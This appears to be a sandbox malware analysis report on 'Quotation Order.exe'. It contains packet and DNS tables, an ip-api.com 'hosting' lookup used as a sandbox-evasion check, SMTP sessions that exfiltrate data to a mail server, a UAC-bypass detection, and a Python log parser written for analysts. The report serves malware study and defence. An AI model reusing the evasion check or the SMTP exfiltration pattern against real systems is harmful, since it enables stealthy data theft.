                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.908293962 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.908293962 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.908385992 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.908385992 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.908459902 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.908459902 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.910569906 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:20.104512930 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:20.104526997 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:20.104541063 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:20.104547977 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:20.104655981 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:20.104696989 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:20.106484890 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:20.107192039 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:20.168075085 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:22.164619923 CEST4971580192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:22.316895962 CEST8049715208.95.112.1192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:22.318309069 CEST4971580192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:22.318850040 CEST4971580192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:22.472193003 CEST8049715208.95.112.1192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:22.620587111 CEST4971580192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:23.447885990 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:23.643996954 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:23.644073963 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:23.893275023 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:23.893517971 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.089807987 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.090234995 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.287837982 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.292270899 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.510375977 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.510436058 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.510479927 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.510498047 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.512618065 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.709444046 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.722767115 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.918926001 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:24.919246912 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.115803957 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.118999958 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.316566944 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.316849947 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.512995958 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.514751911 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.720312119 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.720551968 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.916692019 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.917356968 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.917462111 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.917506933 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.917546988 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.917563915 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.917583942 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:25.917603970 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:26.113326073 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:26.113450050 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:26.113550901 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:26.113605976 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:26.113712072 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:26.114523888 CEST58749717192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:26.261740923 CEST49717587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:28.174942970 CEST4970580192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:28.175215006 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:39.143965960 CEST4971980192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:39.299655914 CEST8049719208.95.112.1192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:39.300019979 CEST4971980192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:39.300117970 CEST4971980192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:39.453018904 CEST8049719208.95.112.1192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:39.496159077 CEST4971980192.168.2.10208.95.112.1
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:40.360558987 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:40.556811094 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:40.556901932 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:40.805790901 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:40.807872057 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:41.017981052 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:41.018157959 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:41.215791941 CEST58749721192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:41.219894886 CEST49721587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:41.342187881 CEST49703587192.168.2.10192.254.225.166
Apr 26, 2024 10:07:41.342828989 CEST | 49701 | 80 | 192.168.2.10 | 208.95.112.1
Apr 26, 2024 10:07:41.432214975 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:41.432236910 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:41.432250023 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:41.432293892 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:41.436882019 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:41.633704901 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:41.652888060 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:41.849415064 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:41.849771023 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.076224089 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:42.080549955 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.278179884 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:42.278489113 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.474723101 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:42.474970102 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.685122967 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:42.685539007 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.881747961 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:42.882354021 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.882472992 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.882528067 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.882567883 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.882594109 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.882621050 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:42.882642031 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:07:43.078429937 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:43.078447104 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:43.078460932 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:43.078474045 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:43.078778982 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:43.079422951 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:07:43.183640957 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:08:13.449878931 CEST | 49715 | 80 | 192.168.2.10 | 208.95.112.1
Apr 26, 2024 10:08:13.601846933 CEST | 80 | 49715 | 208.95.112.1 | 192.168.2.10
Apr 26, 2024 10:08:13.601942062 CEST | 49715 | 80 | 192.168.2.10 | 208.95.112.1
Apr 26, 2024 10:08:30.371752024 CEST | 49719 | 80 | 192.168.2.10 | 208.95.112.1
Apr 26, 2024 10:08:30.523267031 CEST | 80 | 49719 | 208.95.112.1 | 192.168.2.10
Apr 26, 2024 10:08:30.523401976 CEST | 49719 | 80 | 192.168.2.10 | 208.95.112.1
Apr 26, 2024 10:09:03.465676069 CEST | 49717 | 587 | 192.168.2.10 | 192.254.225.166
Apr 26, 2024 10:09:03.704371929 CEST | 587 | 49717 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:09:04.092318058 CEST | 587 | 49717 | 192.254.225.166 | 192.168.2.10
Apr 26, 2024 10:09:04.095932961 CEST | 49717 | 587 | 192.168.2.10 | 192.254.225.166
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 26, 2024 10:07:11.054128885 CEST | 60447 | 53 | 192.168.2.10 | 1.1.1.1
Apr 26, 2024 10:07:11.179255009 CEST | 53 | 60447 | 1.1.1.1 | 192.168.2.10
Apr 26, 2024 10:07:12.759141922 CEST | 53934 | 53 | 192.168.2.10 | 1.1.1.1
Apr 26, 2024 10:07:12.970603943 CEST | 53 | 53934 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 26, 2024 10:07:11.054128885 CEST | 192.168.2.10 | 1.1.1.1 | 0xc6c3 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:07:12.759141922 CEST | 192.168.2.10 | 1.1.1.1 | 0xc9a7 | Standard query (0) | mail.bonnyriggdentalsurgery.com.au | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 26, 2024 10:07:11.179255009 CEST | 1.1.1.1 | 192.168.2.10 | 0xc6c3 | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:07:12.970603943 CEST | 1.1.1.1 | 192.168.2.10 | 0xc9a7 | No error (0) | mail.bonnyriggdentalsurgery.com.au | - | 192.254.225.166 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:07:13.395530939 CEST | 1.1.1.1 | 192.168.2.10 | 0x7bd1 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:07:13.395530939 CEST | 1.1.1.1 | 192.168.2.10 | 0x7bd1 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:08:14.741743088 CEST | 1.1.1.1 | 192.168.2.10 | 0xa026 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 10:08:14.741743088 CEST | 1.1.1.1 | 192.168.2.10 | 0xa026 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
• ip-api.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49701 | 208.95.112.1 | 80 | 7440 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 10:07:11.343307018 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Apr 26, 2024 10:07:11.499897003 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 08:07:11 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 18
X-Rl: 43
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49705 | 208.95.112.1 | 80 | 7976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 10:07:13.768683910 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Apr 26, 2024 10:07:13.922867060 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 08:07:13 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 16
X-Rl: 42
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49715 | 208.95.112.1 | 80 | 7240 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 10:07:22.318850040 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Apr 26, 2024 10:07:22.472193003 CEST | 174 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 08:07:22 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 7
X-Rl: 41
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49719 | 208.95.112.1 | 80 | 4884 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 10:07:39.300117970 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Apr 26, 2024 10:07:39.453018904 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 08:07:39 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 26, 2024 10:07:13.443326950 CEST | 587 | 49703 | 192.254.225.166 | 192.168.2.10 | 220-gator3119.hostgator.com ESMTP Exim 4.95 #2 Fri, 26 Apr 2024 03:07:13 -0500
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 26, 2024 10:07:13.443790913 CEST | 49703 | 587 | 192.168.2.10 | 192.254.225.166 | EHLO 878411
Apr 26, 2024 10:07:13.640345097 CEST | 587 | 49703 | 192.254.225.166 | 192.168.2.10 | 250-gator3119.hostgator.com Hello 878411 [102.129.152.220]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 26, 2024 10:07:13.640543938 CEST | 49703 | 587 | 192.168.2.10 | 192.254.225.166 | STARTTLS
Apr 26, 2024 10:07:13.842605114 CEST | 587 | 49703 | 192.254.225.166 | 192.168.2.10 | 220 TLS go ahead
Apr 26, 2024 10:07:15.745795012 CEST | 587 | 49708 | 192.254.225.166 | 192.168.2.10 | 220-gator3119.hostgator.com ESMTP Exim 4.95 #2 Fri, 26 Apr 2024 03:07:15 -0500
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 26, 2024 10:07:15.745964050 CEST | 49708 | 587 | 192.168.2.10 | 192.254.225.166 | EHLO 878411
Apr 26, 2024 10:07:15.942356110 CEST | 587 | 49708 | 192.254.225.166 | 192.168.2.10 | 250-gator3119.hostgator.com Hello 878411 [102.129.152.220]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 26, 2024 10:07:15.943594933 CEST | 49708 | 587 | 192.168.2.10 | 192.254.225.166 | STARTTLS
Apr 26, 2024 10:07:16.141052008 CEST | 587 | 49708 | 192.254.225.166 | 192.168.2.10 | 220 TLS go ahead
Apr 26, 2024 10:07:23.893275023 CEST | 587 | 49717 | 192.254.225.166 | 192.168.2.10 | 220-gator3119.hostgator.com ESMTP Exim 4.95 #2 Fri, 26 Apr 2024 03:07:23 -0500
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 26, 2024 10:07:23.893517971 CEST | 49717 | 587 | 192.168.2.10 | 192.254.225.166 | EHLO 878411
Apr 26, 2024 10:07:24.089807987 CEST | 587 | 49717 | 192.254.225.166 | 192.168.2.10 | 250-gator3119.hostgator.com Hello 878411 [102.129.152.220]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 26, 2024 10:07:24.090234995 CEST | 49717 | 587 | 192.168.2.10 | 192.254.225.166 | STARTTLS
Apr 26, 2024 10:07:24.287837982 CEST | 587 | 49717 | 192.254.225.166 | 192.168.2.10 | 220 TLS go ahead
Apr 26, 2024 10:07:40.805790901 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10 | 220-gator3119.hostgator.com ESMTP Exim 4.95 #2 Fri, 26 Apr 2024 03:07:40 -0500
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Apr 26, 2024 10:07:40.807872057 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166 | EHLO 878411
Apr 26, 2024 10:07:41.017981052 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10 | 250-gator3119.hostgator.com Hello 878411 [102.129.152.220]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Apr 26, 2024 10:07:41.018157959 CEST | 49721 | 587 | 192.168.2.10 | 192.254.225.166 | STARTTLS
Apr 26, 2024 10:07:41.215791941 CEST | 587 | 49721 | 192.254.225.166 | 192.168.2.10 | 220 TLS go ahead
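The two tables above are what a sandbox gets to see of mail-based exfiltration: a pre-flight lookup of the public IP against ip-api.com's `hosting` field (the "data center or colocation facility" check in the signature list), then four submissions to gator3119.hostgator.com on port 587 that each go dark right after STARTTLS. The Python below is an added example, not part of the Joe Sandbox report or of any tooling the report describes. It parses a condensed copy of those rows (constructed inline from the tables, columns separated by whitespace, two of the four sessions, repeated 250- capability lines trimmed), groups the SMTP rows into client sessions and returns the indicators an analyst would pull out. The six-column layout, the `MAIL_PORTS` set and the flag wording are this example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed inline from the report's SMTP table (first two sessions, the
# repeated 250- capability lines trimmed). Columns, whitespace-separated:
#   time  src_port  dst_port  src_ip  dst_ip  command
SMTP_LOG = """\
10:07:13.443 587 49703 192.254.225.166 192.168.2.10 220-gator3119.hostgator.com ESMTP Exim 4.95 #2
10:07:13.443 49703 587 192.168.2.10 192.254.225.166 EHLO 878411
10:07:13.640 587 49703 192.254.225.166 192.168.2.10 250-gator3119.hostgator.com Hello 878411 [102.129.152.220]
10:07:13.640 587 49703 192.254.225.166 192.168.2.10 250-AUTH PLAIN LOGIN
10:07:13.640 587 49703 192.254.225.166 192.168.2.10 250-STARTTLS
10:07:13.640 49703 587 192.168.2.10 192.254.225.166 STARTTLS
10:07:13.842 587 49703 192.254.225.166 192.168.2.10 220 TLS go ahead
10:07:15.745 587 49708 192.254.225.166 192.168.2.10 220-gator3119.hostgator.com ESMTP Exim 4.95 #2
10:07:15.745 49708 587 192.168.2.10 192.254.225.166 EHLO 878411
10:07:15.942 587 49708 192.254.225.166 192.168.2.10 250-AUTH PLAIN LOGIN
10:07:15.942 587 49708 192.254.225.166 192.168.2.10 250-STARTTLS
10:07:15.943 49708 587 192.168.2.10 192.254.225.166 STARTTLS
10:07:16.141 587 49708 192.254.225.166 192.168.2.10 220 TLS go ahead
"""

# Constructed from the report's HTTP table: direction, then the raw line.
HTTP_LOG = """\
OUT GET /line/?fields=hosting HTTP/1.1
OUT Host: ip-api.com
IN HTTP/1.1 200 OK
IN Content-Type: text/plain; charset=utf-8
IN false
"""

ROW = re.compile(r"^(?P<ts>\S+)\s+(?P<sport>\d+)\s+(?P<dport>\d+)\s+"
                 r"(?P<sip>[\d.]+)\s+(?P<dip>[\d.]+)\s+(?P<cmd>.*)$")
MAIL_PORTS = {25, 465, 587}   # assumption: which ports count as the mail server side


def parse_smtp(log):
    """One dict per row; lines that do not fit the six-column layout are skipped."""
    rows = []
    for line in log.splitlines():
        m = ROW.match(line)
        if m:
            r = m.groupdict()
            r["sport"], r["dport"] = int(r["sport"]), int(r["dport"])
            rows.append(r)
    return rows


def group_sessions(rows):
    """Bucket rows by (client_ip, client_port); the client is the side not on a mail port."""
    sessions = defaultdict(list)
    for r in rows:
        if r["dport"] in MAIL_PORTS:
            sessions[(r["sip"], r["sport"])].append(r)
        elif r["sport"] in MAIL_PORTS:
            sessions[(r["dip"], r["dport"])].append(r)
    return dict(sessions)


def analyze_session(rows):
    """Summarize one session and flag the parts that matter for mail-based exfiltration."""
    first = rows[0]
    if first["dport"] in MAIL_PORTS:
        client, server = (first["sip"], first["sport"]), (first["dip"], first["dport"])
    else:
        client, server = (first["dip"], first["dport"]), (first["sip"], first["sport"])
    client_cmds = [r["cmd"] for r in rows if r["sip"] == client[0]]
    server_cmds = [r["cmd"] for r in rows if r["sip"] != client[0]]

    banner = next((c[4:].split()[0] for c in server_cmds if c.startswith("220") and "ESMTP" in c), None)
    ehlo = next((c.split(None, 1)[1] for c in client_cmds if c.upper().startswith("EHLO ")), None)
    seen_as = None                      # the MTA echoes the public IP it saw the client from
    for c in server_cmds:
        m = re.search(r"Hello \S+ \[(\d+\.\d+\.\d+\.\d+)\]", c)
        if m:
            seen_as = m.group(1)
            break
    auth_plain = any(c.startswith("250") and "AUTH" in c and "PLAIN" in c for c in server_cmds)
    upgraded = "STARTTLS" in client_cmds and any(c.startswith("220") and "TLS go ahead" in c for c in server_cmds)
    # Everything the client sends after STARTTLS (AUTH, MAIL FROM, RCPT TO, DATA) rides inside TLS,
    # so this list is empty for a clean upgrade and non-empty only if the client kept talking in clear.
    cleartext_after = client_cmds[client_cmds.index("STARTTLS") + 1:] if "STARTTLS" in client_cmds else client_cmds

    flags = []
    if ehlo is not None and "." not in ehlo:
        flags.append("EHLO uses a bare name rather than an FQDN: %r" % ehlo)
    if server[1] == 587 and upgraded and not cleartext_after:
        flags.append("submission session went opaque right after STARTTLS; credentials and payload are not in the capture")
    if auth_plain and not upgraded:
        flags.append("AUTH PLAIN offered with no TLS upgrade; credentials would be readable in the capture")
    return {"client": "%s:%d" % client, "server": "%s:%d" % server,
            "server_banner": banner, "ehlo_name": ehlo, "client_public_ip_seen_by_mta": seen_as,
            "auth_plain_offered": auth_plain, "starttls_upgraded": upgraded,
            "cleartext_cmds_after_starttls": len(cleartext_after), "flags": flags}


def analyze_http(log):
    """Recognize the ip-api.com hosting lookup; a body of 'true' is what a sandbox-aware sample reacts to."""
    out = [l[4:] for l in log.splitlines() if l.startswith("OUT ")]
    inc = [l[3:] for l in log.splitlines() if l.startswith("IN ")]
    check = any(l.startswith("GET ") and "fields=hosting" in l for l in out) and \
        any(l.lower() == "host: ip-api.com" for l in out)
    body = next((l for l in reversed(inc) if l in ("true", "false")), None)
    return {"hosting_check": check, "hosting_response": body}


if __name__ == "__main__":
    print(analyze_http(HTTP_LOG))
    for key, session_rows in group_sessions(parse_smtp(SMTP_LOG)).items():
        print(key, analyze_session(session_rows))
```

Two things the output makes concrete. The MTA's `Hello 878411 [102.129.152.220]` line leaks the sandbox's public egress address back into the capture, which is worth knowing before sharing a pcap. And because every session upgrades to TLS before AUTH, the mailbox credentials and the stolen data are not recoverable from the network table at all; they have to come from the extracted malware configuration (the report's "Found malware configuration" signature) or from TLS interception inside the sandbox.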

Target ID: 0
Start time: 10:07:01
Start date: 26/04/2024
Path: C:\Users\user\Desktop\Quotation Order.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\Quotation Order.exe"
Imagebase: 0x259e98c0000
File size: 912'780 bytes
MD5 hash: D797AAE1EAF481E9C887482192B84109
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 10:07:01
Start date: 26/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff620390000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 10:07:01
Start date: 26/04/2024
